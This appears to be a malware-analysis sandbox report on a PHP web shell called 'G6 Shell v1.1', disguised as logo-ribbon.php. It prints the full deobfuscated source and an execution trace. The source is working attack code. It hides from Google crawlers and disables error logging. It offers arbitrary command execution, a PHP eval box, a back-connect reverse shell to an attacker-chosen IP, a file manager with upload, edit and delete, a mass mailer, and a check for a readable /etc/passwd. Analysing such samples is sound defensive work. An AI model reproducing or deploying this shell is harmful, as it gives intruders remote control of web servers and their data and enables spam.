PHP Malware Analysis

logo-ribbon.php

md5: 1270c73f8ecb757a9381d68712b23913

Jump to:

Screenshot


Attributes

Emails

Environment

Execution

Files

Input

Title

URLs
  • http://localhost/uploads/logo-ribbon.php (Traces)
  • http://www.dnsstuff.com/tools?runFromMain= (Deobfuscated, Original)
  • http://www.dnsstuff.com/tools?runFromMain=::1& (HTML)
  • http://www.exploit-db.com/search/?action=search& (HTML)
  • http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description= (Deobfuscated, Original)
  • http://www.who.is/whois/ (Deobfuscated, Original)
  • http://www.who.is/whois/localhost (HTML)


Deobfuscated PHP code

<style stype="text/css">
.flink{font-weight:normal;}
body{background-color:#101010;  background:#101010;color:#f2f2f2;font-family:tahoma;font-size:12px;}
body a{ color:#3467BA;font-weight:bold;text-decoration:none;}
body a:hover{text-decoration:underline;}
#main_content{border:1px solid #5C7296;overflow:hidden;width:1000px;height:auto;padding:15px;margin: 0 auto;background:#0A0A0A;border-radius:6px;-moz-border-radius:6px;-webkit-border-radius:6px;}
.enabled{color:#7ACC29;}
.enabled a{color:#7ACC29;font-weight:normal;}
.disabled{color:#CC0000;}
.execbox{width:250px;padding: 5px 15px 15px 15px;height:auto;border:solid 1px #47A3FF;background:#0A0A0A;}
.viewsource{border:solid 1px #47A3FF;background:#0A0A0A;color:#f2f2f2;}
.command{width:620px;border:solid 1px #47A3FF;outline:none;background:#0A0A0A;color:#f2f2f2;}
.response{width:616px;color:green;height:300px;border-bottom:solid 1px #47A3FF;border-right:solid 1px #47A3FF;border-left:solid 1px #47A3FF;border-top:0;outline:none;background:#0A0A0A;color:#f2f2f2;margin:-4px 0px 0px 0px;}
.TableHeader_Name{width:450px;padding:0px 0px 0px 5px;height:25px;font-weight:bold;font-family:verdana;background-color:#282828;border-top-left-radius:4px;-moz-border-top-left-radius:4px;-webkit-border-top-left-radius:4px;}
.TableHeader{width:100px;height:25px;font-weight:bold;font-family:verdana;text-align:center;background-color:#282828;}
.TableHeaderoptions{padding:0px 0px 0px 15px;width:170px;height:25px;font-weight:bold;font-family:verdana;background-color:#282828;border-top-right-radius:4px;-moz-border-top-right-radius:4px;-webkit-border-top-right-radius:4px;}
.filesize{color:green;text-align:center;}
.filenames a{font-weight:normal;text-decoration:none;}
.filenames a:hover{text-decoration:underline;}
tr{background-color: #080808;}
tr:hover{background-color:#282828;}
#options{font-weight:200;font-family:tahoma;margin-left:10px;display:block;}
#title{font-size:25px;font-weight:bold;font-family:arial;display:block;padding:15px 0px 0px 0px;}
.Logo{font-size:150px;text-align:center;color:#101010;}
.logotext{font-size:20px;text-align:center;color:#101010;}
.terminaltop{background-color:#686868;margin:-10px 0px -3px 0px;width:622px;height:20px;border-top-right-radius:5px;-moz-border-top-right-radius:5px;-webkit-border-top-right-radius:5px;border-top-left-radius:5px;-moz-border-top-left-radius:5px;-webkit-border-top-left-radius:5px;}
.TableHeaderoptions2{padding:0px 0px 0px 15px;width:170px;height:25px;font-weight:bold;font-family:verdana;background-color:#282828;border-top-right-radius:4px;-moz-border-top-right-radius:4px;-webkit-border-top-right-radius:4px;}
.box{padding:10px;background-color:#292929;border:1px solid #3467BA;height:auto;width:970;border-radius:6px;-moz-border-radius:6px;-webkit-border-radius:6px;}
.box2{padding:5px;background-color:#000000;height:auto;width:970;border-radius:6px;-moz-border-radius:6px;-webkit-border-radius:6px;}
.optionstr td{background-color:#0A0A0A;}
.optionstr td:hover{background-color:#0A0A0A;}
.chdir{background-color:#010101;color:#f2f2f2;border:1px solid #3467BA;outline:none;font-size:11px;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;padding:2px 3px;margin:0 0 0 -1px;}
.godir{margin:0px 10px 0px -5px;background-color:#292929;color:#f2f2f2;border:1px solid #3467BA;outline:none;font-size:11px;width:24px;border-top-right-radius:4px;-moz-border-top-right-radius:4px;-webkit-border-top-right-radius:4px;border-bottom-right-radius:4px;-moz-border-bottom-right-radius:4px;-webkit-border-bottom-right-radius:4px;}
</style>
<body>
        <div id="main_content">
<?php 
ob_start();
ini_set('display_errors', false);
ini_set('memory_limit', '-1');
if (strpos($_SERVER['HTTP_USER_AGENT'], 'Google') !== false) {
    header('HTTP/1.0 404 Not Found');
    exit;
}
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
echo "<title>G6 Shell v1.1 - Private .::Made By Mr. P-teo::.</title>";
function get_srv_info()
{
    echo "<br /><span id='title'>G6 Shell v1.1 - Private</span><br /><div class='box'><b>Server Name: </b>" . $_SERVER["SERVER_NAME"] . "<br />\r\n        <b>Server IP: </b>" . $_SERVER["SERVER_ADDR"] . " <span class='enabled'><a href='http://www.who.is/whois/" . $_SERVER['HTTP_HOST'] . "' target='_blank'>[WHOIS]</a> - <a href='http://www.dnsstuff.com/tools?runFromMain=" . $_SERVER["SERVER_ADDR"] . "&toolType=traceroute' target='_blank'>[TRACEROUTE]</a></span><br />" . "<b>Shell Location: </b>" . $_SERVER["SCRIPT_FILENAME"] . "<br />\r\n        <b>Server Software: </b>" . $_SERVER["SERVER_SOFTWARE"] . " <span class='enabled'><a href='http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=" . $_SERVER['SERVER_SOFTWARE'] . "&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=' target='_blank'>[Exploit DB]</a></span><br />\r\n        </div><br /><br /><p></p>";
}
function cmd()
{
    $disabled = explode(', ', ini_get('disable_functions'));
    $diabledLower = array();
    foreach ($diabled as $function) {
        $diabledLower[] = strtolower($function);
    }
    if (!in_array($diabledLower, "exec")) {
        return "exec";
    } elseif (!in_array($diabledLower, "passthru")) {
        return "passthru";
    } elseif (!in_array($diabledLower, "system")) {
        return "system";
    } else {
        return "none";
    }
}
$shellVersion = "1.1";
$upload = $_GET['dXBsb2Fk'];
$downloadfilename = $_GET['ZG93bg'];
$delete = $_GET['delete'];
$file_explorer = $_GET['ZmlsZV9leHBsb3Jlcg'];
$mkdir = $_GET['bWtkaXI'];
$currentDirectoryFileDl = $_GET['downlfile'];
$NavLinks = array(array("name" => "Main", "url" => "?"), array("name" => "Server Information", "url" => "?c3J2aW5mbw="), array("name" => "File Explorer", "url" => "?ZmlsZV9leHBsb3Jlcg=/var/www/html/"), array("name" => "Terminal", "url" => "?dGVybWlhbmw"), array("name" => "Hash Identifier", "url" => "?aGk="), array("name" => "PHP Exec", "url" => "?eval"), array("name" => "Back Connect", "url" => "?YmNrbmV0="), array("name" => "Mass Mailer", "url" => "?kueqymass"), array("name" => "Shell-101", "url" => "?a253aXN1ZQ"), array("name" => "Self Remove", "url" => "?srmve"));
$CurrentUrl = "http://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
$last = count($NavLinks) - 1;
foreach ($NavLinks as $NavLink => $NavRow) {
    $linknames = $NavLink == 0;
    $linkurls = $NavLink == $last;
    echo '<a href="' . $NavRow['url'] . '">' . $NavRow['name'] . '</a> / ';
}
if (strstr($CurrentUrl, "readfile")) {
    $sourcefile = $_REQUEST['readfile'];
    if (is_file($sourcefile)) {
        get_srv_info();
        if (isset($sourcefile)) {
            $Finalsource = file_get_contents($sourcefile);
            echo "<strong>Editing: </strong>" . $sourcefile . "<br /><br /><a href='" . $_SERVER['HTTP_REFERER'] . "'>&laquo; Back to files</a><br /><form action='' method='POST'><textarea name='sourcecode' class='viewsource' rows='20' cols='121'>" . htmlentities($Finalsource) . "</textarea><br /><input type='Submit' value='Save File' name='save' /></form>";
        }
    } else {
        echo "Data not sent.";
    }
    if (isset($_POST['save'])) {
        $new_source = $_POST['sourcecode'];
        $source_edit = fopen($sourcefile, 'w');
        fwrite($source_edit, $new_source);
        fclose($source_edit);
    }
} elseif (strstr($CurrentUrl, "aGk")) {
    get_srv_info();
    echo "<p>G6 hash identifier is able to identify MD5, SHA-1, MySQL5, DES(Unix), SHA-256, SHA-384, SHA-512, MD5(Unix), MD5(APR), MD5(phpBB3), MD5(Wordpress), SHA-256(Unix), SHA-512(Unix) and MD5(Base-64).</p>";
    if (isset($_POST['gethash'])) {
        $hash = $_POST['hash'];
        if (strlen($hash) == 32) {
            $hashresult == "MD5 Hash";
        } elseif (strlen($hash) == 40) {
            $hashresult = "SHA-1 Hash/ /MySQL5 Hash";
        } elseif (strlen($hash) == 13) {
            $hashresult = "DES(Unix) Hash";
        } elseif (strlen($hash) == 16) {
            $hashresult = "MySQL Hash / /DES(Oracle Hash)";
        } elseif (strlen($hash) == 41) {
            $GetHashChar = substr($hash, 40);
            if ($GetHashChar == "*") {
                $hashresult = "MySQL5 Hash";
            }
        } elseif (strlen($hash) == 64) {
            $hashresult = "SHA-256 Hash";
        } elseif (strlen($hash) == 96) {
            $hashresult = "SHA-384 Hash";
        } elseif (strlen($hash) == 128) {
            $hashresult = "SHA-512 Hash";
        } elseif (strlen($hash) == 34) {
            if (strstr($hash, '$1$')) {
                $hashresult = "MD5(Unix) Hash";
            }
        } elseif (strlen($hash) == 37) {
            if (strstr($hash, '$apr1$')) {
                $hashresult = "MD5(APR) Hash";
            }
        } elseif (strlen($hash) == 34) {
            if (strstr($hash, '$H$')) {
                $hashresult = "MD5(phpBB3) Hash";
            }
        } elseif (strlen($hash) == 34) {
            if (strstr($hash, '$P$')) {
                $hashresult = "MD5(Wordpress) Hash";
            }
        } elseif (strlen($hash) == 39) {
            if (strstr($hash, '$5$')) {
                $hashresult = "SHA-256(Unix) Hash";
            }
        } elseif (strlen($hash) == 39) {
            if (strstr($hash, '$6$')) {
                $hashresult = "SHA-512(Unix) Hash";
            }
        } elseif (strlen($hash) == 24) {
            if (strstr($hash, '==')) {
                $hashresult = "MD5(Base-64) Hash";
            }
        } else {
            $hashresult = "Hash type not found";
        }
    } else {
        $hashresult = "Not Hash Entered";
    }
    ?>
        <center>
                <form action="" method="POST"><table><tr class="optionstr"><td>Enter Hash:</td> <td><input type="text" name="hash" class="command" /></td><td><input type="submit" name="gethash" value="Identify Hash" /></td></tr><tr class="optionstr"><td>Result: </td><td><?php 
    echo $hashresult;
    ?></td></tr></table></form>
        </center>
       
        <?php 
} elseif (strstr($CurrentUrl, "YmNrbmV0")) {
    get_srv_info();
    echo "\r\n<div id=\"back\">\r\n           <h2>Back Connect</h2>\r\n           <p>Back connect will allow you to enter system commands remotely.</p>\r\n           <p>\r\n           <table>\r\n                                <form action=\"\" method=\"post\">\r\n                                <tr class=\"optionstr\"><td>IP Address: </td><td><input type=\"textbox\" name=\"ip\" style=\"border:1px solid #5C7296; color: #5C7296;background-color:#1d1d1d;font-size:13px;\"></td></tr>\r\n                                <tr class=\"optionstr\"><td>Port: </td><td><input type=\"textbox\" name=\"port\" style=\"border:1px solid #5C7296; color: #5C7296;background-color:#1d1d1d;font-size:13px;\"></td></tr>\r\n                                <tr class=\"optionstr\"><td><input type=\"submit\" name=\"bind\" value=\"Open Connection\" style=\"border:1px solid #5C7296; color: #5C7296;background-color:#1d1d1d;font-size:13px;\"></td></tr>\r\n                                </form>\r\n                                </table>";
    if (isset($_POST['bind'])) {
        echo "<p>Attempting Connection...</p>";
        $ip = $_POST['ip'];
        $port = $_POST['port'];
        $sockfd = fsockopen($ip, $port, $errno, $errstr);
        if ($errno != 0) {
            echo "<font color='red'><b>{$errno}</b> : {$errstr}</font>";
        } else {
            if (!$sockfd) {
                $result = "<p>Unexpected error has occured, connection may have failed.</p>";
            } else {
                fputs($sockfd, "\n{################################################################}\n..:: G6 W3b Sh3ll v1.1- Coded By Mr. P-teo ::..\n\n=> Backconnect \n=> Back        \n\r\n                                                         \n{################################################################}");
                $pwd = shell_exec("pwd");
                $sysinfo = shell_exec("uname -a");
                $time = Shell_exec("time");
                $len = 1337;
                fputs($sockfd, "User ", $sysinfo, "connected @ ", $time, "\n\n");
                while (!feof($sockfd)) {
                    $cmdPrompt = '[G6]#:> ';
                    fputs($sockfd, $cmdPrompt);
                    $command = fgets($sockfd, $len);
                    fputs($sockfd, "\n" . shell_exec($command) . "\n\n");
                }
                fclose($sockfd);
            }
        }
    }
    echo "</p></div>";
} elseif (strstr($CurrentUrl, "bWtmbA")) {
    get_srv_info();
    echo "<p>If no file path is included it will be created within the same directory as the shell.</p><form action='' method='post'><p>Filename: <input type='text' name='newfilename' /></p><p><input type='submit' value='Create File' name='create' /></p></form>";
    $newfilename = htmlentities($_POST['newfilename']);
    if (isset($_POST['create'])) {
        $ourFileName = $newfilename;
        $ourFileHandle = fopen($ourFileName, 'w') or die("can't open file");
        fclose($ourFileHandle);
    }
    echo "<br /><br />";
} elseif (strstr($CurrentUrl, "bWtkaXI")) {
    get_srv_info();
    echo "<p>If no file path is included directory will be created within the same directory as the shell.</p>\r\n                <form action='' method='post'>\r\n                <p>Directory Name: <input type='text' name='newdirname' /></p>\r\n                <p><input type='submit' value='Create New Directory' name='createdir' /></p>\r\n                </form>";
    $newdirname = htmlentities($_POST['newdirname']);
    if (isset($_POST['createdir'])) {
        $ourdirName = $newdirname;
        mkdir($ourdirName, 0777);
        echo "Directory Created!";
    }
    echo "\r\n                <br /><br />";
} elseif (strstr($CurrentUrl, "ZmlsZV9leHBsb3Jlcg")) {
    get_srv_info();
    $upload = $file_explorer;
    echo '<p><form action="" method="POST"><table><tr class="optionstr"><td><input class="chdir" type="text" name="chdir" value="' . $file_explorer . '"" /></td><td></td></form><td><div id="options"><a href="' . $CurrentUrl . '">Refresh Files</a></div></td><td><div id="options"><!--<a href="?bWtkaXI=' . $file_explorer . '">Make Directory</a> | <a href="?bWtmbA=' . $file_explorer . '">Make File</a> | <a href="?dXBsb2Fk=' . $upload . '">Upload</a></div>--></td></tr>';
    if (isset($_POST['godir'])) {
        $mandircha = $_POST['chdir'];
        if ($mandircha) {
            header("Location: ?ZmlsZV9leHBsb3Jlcg=" . $_POST['chdir']);
        }
    }
    ?>
        </div></p>
                        <table class="FileBrowserTable"><tr><td class="TableHeader_Name"> FileName's</td><td class="TableHeader">Filetype</a></td><td class="TableHeader">Size</td><td class="TableHeader">Permisions</td><td class="TableHeader">Last Modified</td><td class="TableHeaderoptions"> Options</td></tr>
                <?php 
    $Shell_Directory = $_SERVER['REMOTE_DIR'];
    //load files...
    function GetFileType($file)
    {
        if (!is_dir($file)) {
            if (strstr($file, ".")) {
                $FileExt = end(explode(".", $file));
                return $FileExt;
            } else {
                return "Directory";
            }
        } else {
            $Directory = "Directory";
            return "Directory";
        }
    }
    function GetFileSize($file)
    {
        if (!is_dir($file)) {
            return round(filesize($file) / 1024, 2) . " Kb";
        } else {
            return "Not Availible";
        }
    }
    function LastModified($file)
    {
        return "<center>" . date("m/d/y", filemtime($file)) . "</center>";
    }
    function permissions($file)
    {
        if (is_readable($file)) {
            $readable = "r";
        } else {
            $readable = "?";
        }
        if (is_writable($file)) {
            $writable = "w";
        } else {
            $writable = "?";
        }
        if (is_executable($file)) {
            $executable = "x";
        } else {
            $executable = "?";
        }
        if ($readable . "--" . $writable . "--" . $executable == "r--w--x") {
            return "<center style='color:#f1f1f1;'>" . $readable . "--" . $writable . "--" . $executable . "</center>";
        } else {
            return "<center>" . $readable . "--" . $writable . "--" . $executable . "</center>";
        }
    }
    $Files = scandir($file_explorer);
    foreach ($Files as $File) {
        if ($File == "..") {
            $currentDirectory = $_GET['ZmlsZV9leHBsb3Jlcg'];
            //Up a directory
            $currentDirectory = substr($currentDirectory, 0, strrpos($currentDirectory, "/"));
            echo "<tr><td><a href='?ZmlsZV9leHBsb3Jlcg=" . $currentDirectory . "'>" . $File . "</a></td><td></td><td></td><td></td><td></td><td></td></tr>";
        } elseif ($File == ".") {
            //Same as current Dir, no need for this...
        } else {
            $currentDirectory = $_GET['ZmlsZV9leHBsb3Jlcg'];
            $type = GetFileType($currentDirectory . "/" . $File);
            if ($type == "Directory") {
                echo "<tr><td><a class='flink' title='Explore Directory' href='?ZmlsZV9leHBsb3Jlcg=" . $currentDirectory . "/" . $File . "'>" . $File . "/</a></td><td><center>" . $type . "</center></td><td class='filesize'>" . GetFileSize($currentDirectory . "/" . $File) . "</td><td style='color:red;'>" . permissions($currentDirectory . "/" . $File) . "</td><td>" . LastModified($currentDirectory . "/" . $File) . "</td><td>Not Availible</td></tr>";
            } else {
                echo "<tr><td><a class='flink' title='Edit File' href='?readfile=" . $currentDirectory . "/" . $File . "'>" . $File . "</a></td><td><center>" . $type . "</center></td><td class='filesize'>" . GetFileSize($currentDirectory . "/" . $File) . "</td><td style='color:red;'>" . permissions($currentDirectory . "/" . $File) . "</td><td>" . LastModified($currentDirectory . "/" . $File) . "</td><td><a href='?readfile=" . $currentDirectory . "/" . $File . "' title='Edit File'>E</a> - <a href='?delete=" . $currentDirectory . "/" . $File . "' title='Bin the Document'>B</a> - <a href='?downlfile=" . $currentDirectory . "/" . $File . "&file=" . $File . "' title='Download File'>D</a></td></tr>";
            }
        }
    }
    ?>
</table>
<div style="background:#282828;border-bottom-right-radius:4px;-moz-border-bottom-right-radius:4px;-webkit-border-bottom-right-radius:4px;border-bottom-left-radius:4px;-moz-border-bottom-left-radius:4px;-webkit-border-bottom-left-radius:4px;height:25px;margin:0px 0px 10px 0px;width:1000px;" ></div>
        <div style="padding:10px;background-color: #292929;border: 1px solid #3467BA;border-radius: 6px;-moz-border-radius: 6px;-webkit-border-radius: 6px;width:220px;float:left;margin:10px 10px 15px 0px;">
        <h4>File Upload</h4><form action="" method="post" enctype="multipart/form-data"><input type="file" name="file" /><br /><input type="submit" name="upload" value="Upload File" /></form></div>
        <?php 
    if (isset($_POST['upload'])) {
        if (isset($_FILES['file'])) {
            move_uploaded_file($_FILES["file"]["tmp_name"], $file_explorer . "/" . $_FILES["file"]["name"]);
            echo "<script>alert(\"File successfully uploaded, enjoy.\");</script>";
        }
    }
    ?>
        <div style="padding:10px;background-color: #292929;border: 1px solid #3467BA;border-radius: 6px;-moz-border-radius: 6px;-webkit-border-radius: 6px;width:220px;float:left;margin:10px 10px 15px 0px;">
        <h4>Create Directory</h4>
        <form action="" method="post"><input type="text" name="dirname" /><br /><input type="submit" name="createdir" value="Create Dir" /></form></div>
        <?php 
    if (isset($_POST['createdir'])) {
        if (strlen($_POST['dirname']) > 0) {
            mkdir($file_explorer . "/" . $_POST['dirname'], 777) or die($file_explorer . "/" . $_POST['dirname']);
        }
    }
    ?>
                <br /><br /><br />
<?php 
} elseif (strstr($CurrentUrl, "downlfile")) {
    /*$type = mime_content_type($currentDirectoryFileDl);
      header('Content-Type: '.$type);
      header('Content-Disposition: attachment; filename="'.$currentDirectoryFileDl.'"');*/
    $file = $_GET['file'];
    // header('Content-Type: application/force-download'); Non-standard MIME-Type, incompatible with Samsung C3050 for example. Let it commented
    //readfile($currentDirectoryFileDl);
    forceDL($currentDirectoryFileDl, $file);
    /*
     * forceDL
     *
     * Forces the browser to download file
     *
     * @param string $filePath Path to the selected download
     * @param string $fileName Name of file to be saved, can be anything honestly
     */
    function forceDL($filePath, $fileName)
    {
        /* Rquired for IE */
        if (ini_get('zlib.output_compression')) {
            ini_set('zlib.output_compression', 'Off');
        }
        /*
        Files not downloading with correct headers?
        1) Open file in Notepad++ (or similar) and check for white-space or other code (php code)
        2) Extra code?
        3) Problem found.
        4) Profit
        Should answer most questions
        */
        /* Headers */
        header('Pragma: public');
        header('Expires: 0');
        header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
        header('Last-Modified: ' . gmdate('D, d M Y H:i:s', filemtime($filePath)) . ' GMT');
        header('Cache-Control: private', false);
        header('Content-Type: application/force-download');
        header('Content-disposition: attachment; filename="' . $fileName . '"');
        header('Content-Transfer-Encoding: binary');
        header('Content-length: ' . filesize($filePath));
        readfile($filePath);
        echo $filePath . $fileName;
        exit;
    }
} elseif (strstr($CurrentUrl, "kueqymass")) {
    get_srv_info();
    ?>
                <strong>Mass Mailer</strong>
                <p>Be warned using the mass mailing feature may attract attention to your G6 shell. Seperate each email with <strong>;</strong></p>
                <form action="" method="post">
                        <table><tr><td>To Email(s): </td><td><input type="text" style="background-color:#010101;color:#f2f2f2;border:1px solid #3467BA;outline:none;font-size:11px;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;padding:2px 3px;margin:0 0 0 -1px; width:220px;" name="email" placeholder="email@address.com" /></tr><tr><td>Subject: </td>       <td><input type="text" style="background-color:#010101;color:#f2f2f2;border:1px solid #3467BA;outline:none;font-size:11px;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;padding:2px 3px;margin:0 0 0 -1px;width:220px" name="subject" /></td></tr><tr><td>From Email: </td><td><input type="email" style="background-color:#010101;color:#f2f2f2;border:1px solid #3467BA;outline:none;font-size:11px;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;padding:2px 3px;margin:0 0 0 -1px;width:220px;" name="fromEmail" placeholder="example@google.com" /></td></tr><tr><td>Message: </td><td></td></tr></table><table><tr><td><textarea style="background-color:#010101;color:#f2f2f2;border:1px solid #3467BA;outline:none;font-size:11px;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;padding:2px 3px;margin:0 0 0 -1px; height:200px;width:290px;" name="message"></textarea></td></tr><tr><td><input type="submit" name="send" value="Send Message(s)" /></td></tr></table></form>
                        <?php 
    if (isset($_POST['send'])) {
        $email = $_POST['email'];
        $subject = $_POST['subject'];
        $from = $_POST['fromEmail'];
        $message = $_POST['message'];
        if ($email && $subject && $from && $message) {
            $emails = explode(";", $email);
            foreach ($emails as $email) {
                mail($email, $subject, $message, "From: " . $from);
            }
        }
    }
} elseif (strstr($CurrentUrl, "delete")) {
    if (!is_dir($delete)) {
        unlink($delete);
    } else {
        rmdir($delete);
    }
    header("Location: " . $_SERVER['HTTP_REFERER']);
} elseif (strstr($CurrentUrl, "c3J2aW5mbw")) {
    get_srv_info();
    $s_safemode = ini_get("safe_mode");
    if ($s_safemode = TRUE) {
        $s_safemode = "<span class='enabled'>[ON";
    } else {
        $s_safemode = "<span class='disabled'>[OFF";
    }
    if (extension_loaded('curl')) {
        $curls = "<span class='enabled'>[ON]</span>";
    } else {
        $curls = "<span class='disabled'>[OFF]</span>";
    }
    echo "<b>Server Port: </b>" . $_SERVER['SERVER_PORT'] . "<br /><br /><b>HTTP Connection: </b>" . $_SERVER['HTTP_CONNECTION'] . "<br /><br /><b>Operating System:</b> " . php_uname() . "<br /><br />";
    if (get_magic_quotes_gpc()) {
        echo "<b>Magic Quotes:</b> <span class='enabled'>[ENABLED]</span><br /><br />";
    } else {
        echo "<b>Magic Quotes:</b> <span class='disabled'>[DISABLED]</span><br /><br />";
    }
    echo "<b>PHP Version:</b> " . phpversion() . "<br /><br /><b>Safe Mode: </b>" . $s_safemode . "]</span><br /><br /><b>Curl: </b>" . $curls . "<br /><br /><b>Accept Encoding: </b> " . $_SERVER['HTTP_ACCEPT_ENCODING'] . "<br /><br /><b>Admin: </b>" . $_SERVER['SERVER_ADMIN'] . "<br /><br /><strong>Disabled Functions: </strong>";
    if (!empty($disabled)) {
        foreach ($disabled as $functionsdis) {
            echo $functionsdis . ", ";
        }
    } else {
        echo "none";
    }
    echo "<br /><br /><strong>/etc/passwd: </strong>";
    if (is_readable("/home/etc/passwd")) {
        echo "<span style='color:green;'>Readable</span>";
    } else {
        echo "<span style='color:red;'>Unreadable</span>";
    }
} elseif (strstr($CurrentUrl, "dGVybWlhbmw")) {
    get_srv_info();
    ?>
                <p>Command line execution via exec, passthru or system.</p>
               
                <form action="" method="post"><table><tr><td><b>Command Execution: </b></td><td><input type="text" placeholder="root~$ " autocomplete="off" name="command" class="command"/></td></tr></table>
        <?php 
    $out = array();
    if (cmd() == "exec") {
        echo "Using: exec => ";
        exec($_POST['command'], $out);
        foreach ($out as $line) {
            echo "{$line}\n";
        }
    } elseif (cmd() == "passthru") {
        echo "Using: passthru => ";
        passthru($_POST['command'], $out);
        foreach ($out as $line) {
            echo "{$line}\n";
        }
    } elseif (cmd() == "system") {
        echo "Using: system => ";
        system($_POST['command'], $out);
        foreach ($out as $line) {
            echo "{$line}\n";
        }
    }
} elseif (strstr($CurrentUrl, "a253aXN1ZQ")) {
    get_srv_info();
    echo "\r\n                <h4>Information</h4>\r\n                <p>G6 Shell v" . $shellVersion . " Open Beta Edition - coded by Mr. P-teo, below are the known issues and bugs.</p>";
    ?>
                <ul>
                        <li>is_dir function not returning correct result within child dirs of the file browser.</li>
                        <li>File Browser controls, e.g. rename, create file, delete full dir.</li>
                        <li>Editing can run into trouble with GET Method Not Implemented error.</li>
                </ul>
                <br /><br />
        <?php 
} elseif (strstr($CurrentUrl, "?eval")) {
    get_srv_info();
    ?>
        <div style="float:left;width:700px;">
        <h4>Eval (PHP code execution)</h4>
        <form action="" method="post">
                <textarea name="phpeval" style="width:700px;height:190px;padding:5px;background:#CCCCCC;">//Example, get all PHP info about the server
 
echo phpinfo();</textarea><br />
                <input style="padding:4px 10px;margin:10px 0px;" name="evalexecute" value="Execute Code" type="submit"/>
        </form>
        </div>
        <div style="float:right;width:250px;">
                <h4>Information</h4>
                <p>Enter your specified php code within the textarea and wait for the response.</p>
                <p><strong>Example: </strong><i>echo phpinfo();</i></p><br /><br />
                <h4>Warning</h4>
                <p>including external files with seperate stylesheets may affect the apearence of G6 styles.</p>
        </div>
        <?php 
    if (isset($_POST['evalexecute'])) {
        eval($_POST['phpeval']);
    }
} elseif (strstr($CurrentUrl, "?srmve")) {
    get_srv_info();
    ?>
        <p>If you are sure you wish to remove the shell click the button below, make sure you are certain as you wil only have one shot at this.</p>
        <form action="" method="post">
                <center><input style="padding:7px 15px;margin:10px 0px;" name="Remove" value="Remove Shell" type="submit"/></center>
        </form>
        <?php 
    if (isset($_POST['Remove'])) {
        if (file_exists("/var/www/html/logo-ribbon.php.34a98aed4a59287576f8414d78440682.bin")) {
            unlink("/var/www/html/logo-ribbon.php.34a98aed4a59287576f8414d78440682.bin");
        }
    }
} else {
    get_srv_info();
    ?>
        <br /><br /><br /><br /><div class='Logo'>G6 v<?php 
    echo $shellVersion;
    ?></div><div class='logotext'>Private Shell Coded By Mr. P-teo</div><br /><br /><br />
        <?php 
}
ob_flush();
?>
</div>
<body>
</html>

Execution traces

data/traces/1270c73f8ecb757a9381d68712b23913_trace-1676237601.8891.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 19:33:47.786978]
1	0	1	0.000168	393576
1	3	0	0.000782	505816	{main}	1		/var/www/html/uploads/logo-ribbon.php	0	0
2	4	0	0.000804	505816	ob_start	0		/var/www/html/uploads/logo-ribbon.php	38	0
2	4	1	0.000819	522328
2	4	R			TRUE
2	5	0	0.000833	522328	ini_set	0		/var/www/html/uploads/logo-ribbon.php	39	2	'display_errors'	FALSE
2	5	1	0.000849	522400
2	5	R			''
2	6	0	0.000862	522328	ini_set	0		/var/www/html/uploads/logo-ribbon.php	40	2	'memory_limit'	'-1'
2	6	1	0.000880	522432
2	6	R			'128M'
2	7	0	0.000894	522328	strpos	0		/var/www/html/uploads/logo-ribbon.php	42	2	'python-requests/2.25.1'	'Google'
2	7	1	0.000976	522400
2	7	R			FALSE
2	8	0	0.000994	522328	ini_set	0		/var/www/html/uploads/logo-ribbon.php	44	2	'error_log'	NULL
2	8	1	0.001010	522400
2	8	R			''
2	9	0	0.001023	522328	ini_set	0		/var/www/html/uploads/logo-ribbon.php	45	2	'log_errors'	0
2	9	1	0.001037	522400
2	9	R			'1'
2	10	0	0.001050	522328	ini_set	0		/var/www/html/uploads/logo-ribbon.php	46	2	'max_execution_time'	0
2	10	1	0.001065	522432
2	10	R			'30'
1		A						/var/www/html/uploads/logo-ribbon.php	63	$shellVersion = '1.1'
1		A						/var/www/html/uploads/logo-ribbon.php	65	$upload = NULL
1		A						/var/www/html/uploads/logo-ribbon.php	66	$downloadfilename = NULL
1		A						/var/www/html/uploads/logo-ribbon.php	67	$delete = NULL
1		A						/var/www/html/uploads/logo-ribbon.php	68	$file_explorer = NULL
1		A						/var/www/html/uploads/logo-ribbon.php	69	$mkdir = NULL
1		A						/var/www/html/uploads/logo-ribbon.php	70	$currentDirectoryFileDl = NULL
2	11	0	0.001175	523400	dirname	0		/var/www/html/uploads/logo-ribbon.php	82	1	'/var/www/html/uploads/logo-ribbon.php'
2	11	1	0.001189	523496
2	11	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/logo-ribbon.php	73	$NavLinks = [0 => ['name' => 'Main', 'url' => '?'], 1 => ['name' => 'Server Information', 'url' => '?c3J2aW5mbw='], 2 => ['name' => 'File Explorer', 'url' => '?ZmlsZV9leHBsb3Jlcg=/var/www/html/uploads/'], 3 => ['name' => 'Terminal', 'url' => '?dGVybWlhbmw'], 4 => ['name' => 'Hash Identifier', 'url' => '?aGk='], 5 => ['name' => 'PHP Exec', 'url' => '?eval'], 6 => ['name' => 'Back Connect', 'url' => '?YmNrbmV0='], 7 => ['name' => 'Mass Mailer', 'url' => '?kueqymass'], 8 => ['name' => 'Shell-101', 'url' => '?a253aXN1ZQ'], 9 => ['name' => 'Self Remove', 'url' => '?srmve']]
1		A						/var/www/html/uploads/logo-ribbon.php	113	$CurrentUrl = 'http://localhost/uploads/logo-ribbon.php'
1		A						/var/www/html/uploads/logo-ribbon.php	114	$last = 9
1		A						/var/www/html/uploads/logo-ribbon.php	115	$NavLink = 0
1		A						/var/www/html/uploads/logo-ribbon.php	116	$linknames = TRUE
1		A						/var/www/html/uploads/logo-ribbon.php	117	$linkurls = FALSE
1		A						/var/www/html/uploads/logo-ribbon.php	115	$NavLink = 1
1		A						/var/www/html/uploads/logo-ribbon.php	116	$linknames = FALSE
1		A						/var/www/html/uploads/logo-ribbon.php	117	$linkurls = FALSE
1		A						/var/www/html/uploads/logo-ribbon.php	115	$NavLink = 2
